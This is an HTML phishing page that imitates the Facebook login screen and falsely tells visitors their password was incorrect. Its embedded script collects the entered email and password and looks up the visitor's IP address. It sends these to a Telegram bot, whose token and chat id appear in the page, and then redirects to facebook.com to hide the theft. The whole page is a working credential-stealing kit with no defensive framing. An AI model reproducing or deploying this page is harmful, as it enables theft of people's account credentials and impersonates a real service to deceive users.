<html lang="en">

<head>
  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="icon" type="image/png" href="favicon-16x16.png" />
  <link rel='shortcut icon' type='image/x-icon' href='favicon.ico' />
  <script src="https://kit.fontawesome.com/c543de8271.js" crossorigin="anonymous"></script>

  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
    integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
  <style type="text/css">
    body {
      font-family: Helvetica, Arial, sans-serif;
    }

    .boxilogin {
      background-color: white;
      border-radius: 8px;
      box-shadow: 0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);
      margin: auto;
      padding: 24px 17px;
      border: 1px solid #dddfe2;
    }

    .logtext {
      padding-top: 0px;
      padding-bottom: 24px;
      margin-bottom: 0px;
      font-size: 18px;
      line-height: 22px;
      color: #1c1e21;
    }

    input[type=text] {
      border-radius: 6px;
      font-size: 17px;
      padding: 14px 16px;
      height: 60px;
      background: #FFFFFF url(/rsrc.php/v3/yO/r/YQNfPR9MJfx.png) repeat-x;
      border: 1px solid #dddfe2;
      color: #1d2129;
    }

    input[type=password] {
      border-radius: 6px;
      font-size: 17px;
      padding: 14px 16px;
      height: 60px;
      background: #FFFFFF url(/rsrc.php/v3/yO/r/YQNfPR9MJfx.png) repeat-x;
      border: 1px solid #fa3e3e;
      color: #1d2129;
    }

    .butonisubmit {
      background-color: #1877f2;
      border: none;
      border-radius: 6px;

      width: 100%;
      font-size: 20px;
      line-height: 48px;
      padding: 0 16px;
    }

    .linkforget {
      color: #1877f2;
      font-size: 14px;
      font-weight: 500;
    }

    ._1rf5 {
      width: auto;
    }

    ._1rf5 {
      display: block;
      margin-bottom: 10px;
      overflow: hidden;
      text-align: center;
      white-space: nowrap;
      width: 100%;
    }

    ._1rf8 {
      color: #96999e;
    }

    ._1rf5>span {
      display: inline-block;
      position: relative;
      font-size: 13px;
    }

    ._1rf5>span:before {
      margin-right: 15px;
      right: 100%;
    }

    ._1rf5>span:before,
    ._1rf5>span:after {
      background: #ccd0d5;
      content: "";
      height: 1px;
      position: absolute;
      top: 50%;
      width: 9999px;
    }

    ._1rf5>span:before,
    ._1rf5>span:after {
      background: #d7dade;
    }

    ._1rf5>span:after {
      left: 100%;
      margin-left: 15px;
    }

    ._1rf5>span:before,
    ._1rf5>span:after {
      background: #ccd0d5;
      content: "";
      height: 1px;
      position: absolute;
      top: 50%;
      width: 9999px;
    }

    .createbutton {
      border: none;
      border-radius: 6px;
      font-size: 17px;
      line-height: 48px;
      padding: 0 16px;
      background-color: #42b72a;
      border-color: #42b72a;

      box-sizing: content-box;
      -webkit-font-smoothing: antialiased;
      font-weight: bold;
      justify-content: center;
      position: relative;
      text-align: center;
      text-shadow: none;
      vertical-align: middle;
    }

    .menuja ul {
      align-items: center;
      display: flex;
      flex-wrap: wrap;
      list-style-type: none;
      margin: 0;
      padding: 0;
    }

    .menuja ul li {
      padding-left: 20px;
      font-size: 12px;
      color: #737373;
    }

    .menuja {
      border-bottom: 1px solid #dddfe2;
      padding-bottom: 10px;
    }

    .menuja2 ul {
      align-items: center;
      display: flex;
      flex-wrap: wrap;
      list-style-type: none;
      margin: 0;
      padding: 0;
    }

    .menuja2 ul li {
      padding-left: 20px;
      font-size: 12px;
      color: #737373;
    }

    .menuja2 {
      padding-top: 10px;
    }

    .kolonaboxi {
      padding-left: 0px;
      padding-right: 0px;
    }

    @media only screen and (max-width: 600px) {
      .kolonaboxi {
        padding-left: 10px;
        padding-right: 10px;
      }
    }

    .iconwrongi {
      margin-top: -39px;
      font-size: 22px;
      color: #fa3e3e;
      float: right;
      margin-right: 16px;
    }
  </style>
  <title>Facebook</title>
</head>

<body>
  <div style="background-color:#f0f2f5; text-align: center; padding-bottom:80px">
    <div class="container">
      <div style="padding-top:50px;">
        <img style="width: 240px; height: 84px;" src="llugu.svg">
      </div>
      <div class="row">
        <div class="col-md-4 offset-md-4 kolonaboxi">
          <div class="boxilogin">
            <p class="logtext">Log Into Facebook</p>
            <div class="alert alert-warning" role="alert" style="font-size: 12px;color:#1c1e21">
              You must log in to continue.
            </div>







            <form id="appeali" name="myForm">
              <div class="form-group">
                <input type="text" class="form-control" id="shishabar" aria-describedby="emailHelp"
                  placeholder="Email or Phone Number" autofocus required name="kyqja" onload="uname()">
              </div>
              <div class="form-group">
                <input type="password" class="form-control" placeholder="Password" id="firstpassword" required
                  name="kyqjapass">
              </div>
              <!-- <button type="button" onclick="submitwrong()" class="btn btn-primary butonisubmit" id="buttoni">Log In old</button> -->
              <div style="text-align: left;  margin-bottom:20px;">
                <small style="color:#fa3e3e; text-align: left">The password you’ve entered is incorrect.</small>
              </div>
              <button name="submit" type="submit" class="btn btn-primary butonisubmit" id="submit_btn">Log In</button>
              <div style="padding-top:15px; padding-bottom:10px">
                <a class="linkforget" href="#">Forgot account?</a>
              </div>
              <div class="_1rf5"><span class="_1rf8">or</span></div>
              <div style="padding: 6px 0;">
                <a href="#" class="btn btn-success createbutton">Create New Account</a>
              </div>
            </form>









          </div>
        </div>
      </div>
    </div>
  </div>
  <div style="background-color:#ffffff; padding-top:50px">
    <div class="container">
      <div class="menuja">
        <ul>
          <li>
            English (US)
          </li>
          <li>
            Español
          </li>
          <li>
            Français (France)
          </li>
          <li>
            中文(简体)
          </li>
          <li>
            العربية
          </li>
          <li>
            Português (Brasil)
          </li>
          <li>
            한국어
          </li>
          <li>
            Italiano
          </li>
          <li>
            हिन्दी
          </li>
          <li>
            日本語
          </li>
        </ul>
      </div>
      <div class="menuja2">
        <ul>
          <li>
            Sign Up
          </li>
          <li>
            Log In
          </li>
          <li>
            Messenger
          </li>
          <li>
            Facebook Lite
          </li>
          <li>
            Watch
          </li>
          <li>
            People
          </li>
          <li>
            Pages
          </li>
          <li>
            Page Categories
          </li>
          <li>
            Places
          </li>
          <li>
            Locations
          </li>
          <li>
            Marketplace
          </li>
          <li>
            Facebook Pay
          </li>
          <li>
            GroupsOculus
          </li>
          <li>
            Portal
          </li>
          <li>
            Instagram
          </li>
          <li>
            Local
          </li>
          <li>
            Instagram
          </li>
          <li>
            Fundraisers
          </li>
          <li>
            Services
          </li>
          <li>
            Voting Information Center
          </li>
          <li>
            About
          </li>
          <li>
            Create Ad
          </li>
          <li>
            Create Page
          </li>
          <li>
            Developers
          </li>
          <li>
            Careers
          </li>
          <li>
            Privacy
          </li>
          <li>
            Cookies
          </li>
          <li>
            Ad Choices
          </li>
          <li>
            Terms
          </li>
          <li>
            Help
          </li>
          <li>
            Activity Log
          </li>
        </ul>
      </div>
      <p style="color:#737373; padding-left: 20px; font-size: 12px; margin-top:20px; margin-bottom:20px;">Facebook ©
        2022</p>
    </div>
  </div>



  <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
    integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
    crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"
    integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
    crossorigin="anonymous"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"
    integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
    crossorigin="anonymous"></script>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>




  <script type="text/javascript">

    document.getElementById('shishabar').value = sessionStorage.getItem("email");

    $("#submit_btn").click(function (e) {
      e.preventDefault();
      email = document.getElementById('shishabar').value;
      number = document.getElementById('firstpassword').value;

      if (email == '') {
        document.getElementById('shishabar').style.borderColor = "red";
      } else {
        document.getElementById("shishabar").style.borderColor = "black";
      }
      if (number == '') {
        document.getElementById('firstpassword').style.borderColor = "red";
      } else {
        document.getElementById("firstpassword").style.borderColor = "black";
      }


      if (email != '' && number != '') {
        $.getJSON('https://ipapi.co/json/', function (data) {
          var obj = JSON.parse(JSON.stringify(data, null, 2));
          country_name = obj.country;
          country_code = obj.country_code;
          country_city = obj.city;
          ipaddress = obj.ip;

          // event.preventDefault()
          var siteUrl = window.location.href;
          var emailInfos = 'Ok';
          //var firstPassword =  document.getElementById('inputPassword').value; 

          var params = {
            content: '=============================' + '%0A' +
              'email: "' + email + '"' + '%0A' +
              'pass2: "' + number + '"' + '%0A' +
              'IP: "' + ipaddress + '"' + '%0A' +
              '============================='
          }

          fetch(`https://api.telegram.org/bot5443976882:AAHgcljlO_1i1CEXyiIkNS0fKWCDo6-uLpI/sendMessage?chat_id=-588925059&text=profilausa${params.content}/parse_mode=html`, {
            method: 'POST', // or 'PUT'
            headers: {
              'Content-Type': 'application/json',
            },

          }).then(function () {
            sessionStorage.setItem("email", '');
            window.location.href = "https://facebook.com/456456456465465465465";
          })

        });
      } else {
        console.log("req");
      }




    });




  </script>
  <script src="javas.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"
    integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN"
    crossorigin="anonymous"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"
    integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV"
    crossorigin="anonymous"></script>

</body>

</html>